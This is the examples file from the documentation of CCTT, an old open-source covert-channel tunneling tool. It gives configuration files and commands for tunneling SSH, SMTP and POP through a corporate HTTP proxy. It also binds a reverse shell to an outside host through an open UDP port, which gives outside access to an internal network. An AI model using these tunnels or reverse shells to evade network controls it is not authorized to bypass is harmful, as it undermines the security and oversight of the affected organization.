examples

Cctt, "Covert Channel Tunneling Tool" - 顾名思义

CCTT - Covert Channel Tunneling Tool v0.1.8 - EXAMPLES
Copyright (C) 2002,2003 Simon Castro - scastro@entreelibre.com
$Id: EXAMPLES,v 1.15 2003/08/31 10:34:21 simsim Exp $

================================================================================
This file is part of CCTT - Covert  Channel  Tunneling  Tool  v0.1.8  (C)  Simon
Castro.
CCTT is free software; you can redistribute it and/or modify it under the  terms
of the GNU General Public License as published by the Free Software  Foundation;
either version 2 of the License, or (at your option) any later version.
CCTT is distributed in the  hope  that  it  will  be  useful,  but  WITHOUT  ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS  FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General  Public  License  along  with
CCTT; if not, write to the Free Software  Foundation,  Inc.,  59  Temple  Place,
Suite 330, Boston, MA  02111-1307  USA
================================================================================

  Considering your local network (and access control system) scheme connected to
the Internet and the CCTT functionalities you want, here are a few  examples  of
client/server configuration files and command line parameters you should use.

   I) Pass through an HTTP Proxy  network  scheme  to  access  several  external
      services
  II) Pass through a network scheme having UDP 'holes'. 
 III) Use HTTP Login/Password credentials on an external Website with CCTT
  IV) Use the CCTT client only to get the Proxy Chain functionality
   V) Reverse proxy mode concept demonstration with CCTT
  VI) HTTP  Mode  :  Creating  confusion  sending / receiving  unnecessary  HTTP
      messages
 VII) HTTP Mode : Creating confusion customizing how the server looks like
VIII) HTTP Mode : Creating confusion adding padding to channel datas

================================================================================

I) Pass through an HTTP Proxy network scheme to access several external services

  A] Local network scheme

  An usual local network scheme may have one way out : The HTTP Proxy... but  it
  often allows connections to remote Web  servers  on  TCP  port  443  with  the
  CONNECT method. 
  We assume that we know the proxy IP address : 192.168.1.1  and  its  listening
  port : 8080.

  B] CCTT functionalities

     We want, from the local network :
    * SSH access to our personal box connected to the Internet (111.222.1.1).
    * SMTP access to our personal ISP smtp server (111.222.2.1).
    * POP access to our personal ISP pop server (111.222.2.2).

  C] Configuration files

  Our personal box configuration must be : 
       * SSH server listening on the loopback.
       * Firewall allows In/Out to our ISP smtp and pop servers.
       * A restricted user (without shell, no rights) whose name is cctt.
       * A chroot directory : jail.
    * And finally, we must have superuser access to execute  the  CCTT  server
      part.
       
  The  server  configuration  file  (srv_example_1.cf)  must   look   like   the
  following :
       PROTOCOL=tcp
       IDENT=basic_ident
       IDENT_KEY=simsim
       SRV_SHELL_LOC=/usr/local/bin/false
       SRV_SHELL_CMD=false
       PROXY_MODE_LIST=ssh:127.0.0.1:22
       PROXY_MODE_LIST=smtp:111.222.2.1:25
       PROXY_MODE_LIST=pop:111.222.2.2:110
       PROXY_ONLY=ON
       PERM_USER_GROUP=cctt
       PERM_CHROOT=cage
  
     The client configuration files must look like the following :
     
    cl_example_1_ssh.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4222
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=127.0.0.1
        PROXY_MODE_REMOTE_PORT=22

    cl_example_1_smtp.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=4225
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.1
        PROXY_MODE_REMOTE_PORT=25

    cl_example_1_pop.cf :
	PROTOCOL=tcp
        CHANNEL_PROXY_IP=192.168.1.1
        CHANNEL_PROXY_PORT=8080
        CHANNEL_PROXY_PROT=tcp
	CHANNEL_PROXY_DEL=30000
        IDENT=basic_ident
        IDENT_KEY=simsim
        PROXY_MODE_LOCAL_IP=127.0.0.1
        PROXY_MODE_LOCAL_PORT=42110
        PROXY_MODE_PROT=tcp
        PROXY_MODE_REMOTE_IP=111.222.2.2
        PROXY_MODE_REMOTE_PORT=110

  D] Command line parameters to run CCTT 

    To run the server part, we use (root account) : 
    cctt -s 111.222.1.1 -p 443 -f srv_example_1.cf -t socket_encode -L -v &

    To run the client parts, we use (no root account) : 
    cctt -c 111.222.1.1 -d 443 -f cl_example_1_ssh.cf \
      -t socket_http_proxy_encode -a &
    cctt -c 111.222.1.1 -d 443 -f cl_example_1_smtp.cf \
      -t socket_http_proxy_encode -a &
    cctt -c 111.222.1.1 -d 443 -f cl_example_1_pop.cf \
      -t socket_http_proxy_encode -a &

  We now have 3 TCP ports listening on the box loopback located on the  internal
  network :
    * the 4222 port allows us to reach our Internet personal box using  the  SSH
      protocol.
      * the 4225 port allows us to reach our ISP Smtp external server.
      * the 42110 port allows us to reach our ISP Pop external server.

  The CCTT server is running  on  our  Internet  personal  box  with  restricted
  privileges, jailed in the 'cage' directory and is sending verbose messages  to
  the local Syslogd.

================================================================================

II) Pass through a network scheme having UDP 'holes'.

  A] Local network scheme

  The network scheme we want to pass through is  built  with  a  network  access
  control system badly configured and we know that it is possible to reach, from
  a box of the internal network, an Internet remote server listening on the 7272
  UDP port.

  B] CCTT functionalities

  We  want  to  initiate  an  UDP  connection  to  the  Internet  remote  server
  (111.222.1.1:7272) and bind a reverse-shell to it so that we'll have an access
  to the internal network from the outside box.

  C] Configuration files

  Our personal box configuration must be : 
      * Firewall allows In/Out UDP datagrams on the 7272 port.
      * A restricted user (without shell, no rights) whose name is cctt.
      * A chroot directory : jail.
    * And finally, we must have superuser access  to  execute  the  CCTT  server
      part.

  The  server  configuration  file  (srv_example_2.cf)  must   look   like   the
  following :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/bin/false
      SRV_SHELL_CMD=false
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

  The client configuration file (cl_example_2.cf) must look like the following :
      PROTOCOL=udp
      IDENT=basic_ident
      IDENT_KEY=simsim

  D] Command line parameters to run CCTT 

    To run the server part, we use (root account) : 
    cctt -s 111.222.1.1 -p 7272 -f srv_example_2.cf -t socket_encode -l &

    To run the client part, we use (no root account) : 
    cctt -c 111.222.1.1 -d 7272 -f cl_example_2.cf -t socket_encode -r &
           
  Using the server's interactive mode, we now have  access,  from  our  Internet
  located box, to the internal protected network.
  NB : The shell session is saved in a log file.

================================================================================

III) Use HTTP Login/Password credentials on an external Website with CCTT

  A] Local network scheme

  The network scheme in this example is similar to the I) one, but  any  network
  scheme would have be convenient. We are specially focusing this example on the
  desired functionality.
  We know the HTTP proxy's IP address : 192.168.1.1 and  its  listening  port  :
  8080. We also know that it is possible to use the CONNECT method.

  B] CCTT functionalities

  We have to enter login/password on an Internet Website from our box located on
  the internal network.
  The problem is : 'the remote Web server doesn't have SSL enabled' and we don't
  want the network administrators to look at our credentials on the wire.

  C] Configuration files

  Our personal box configuration must be : 
      * Firewall allows In/Out Tcp access to the remote Web server.
      * A restricted user (without shell, no rights) whose name is cctt.
      * A chroot directory : jail.
    * And finally, we must have superuser access  to  execute  the  CCTT  server
      part.

  The server configuration file (srv_example_3.cf) must look like the following:
      PROTOCOL=tcp
      IDENT=basic_ident
      IDENT_KEY=simsim
      SRV_SHELL_LOC=/usr/local/bin/false
      SRV_SHELL_CMD=false
      PROXY_MODE_LIST=http:111.222.7.7:80
      PROXY_ONLY=ON
      PERM_USER_GROUP=cctt
      PERM_CHROOT=cage

  The client configuration file (cl_example_3.cf) must look like the following :
      PROTOCOL=tcp
      CHANNEL_PROXY_IP=192.168.1.1
      CHANNEL_PROXY_PORT=8080
      CHANNEL_PROXY_PROT=tcp
      CHANNEL_PROXY_DEL=30000
      IDENT=basic_ident
      IDENT_KEY=simsim
      PROXY_MODE_LOCAL_IP=127.0.0.1
      PROXY_MODE_LOCAL_PORT=4280
      PROXY_MODE_PROT=tcp
      PROXY_MODE_REMOTE_IP=111.222.7.7
      PROXY_MODE_REMOTE_PORT=80

  D] Command line parameters to run CCTT 

    To run the server part, we use (root account) : 
    cctt -s 111.222.1.1 -p 443 -f srv_example_3.cf -t socket_encode -L -v &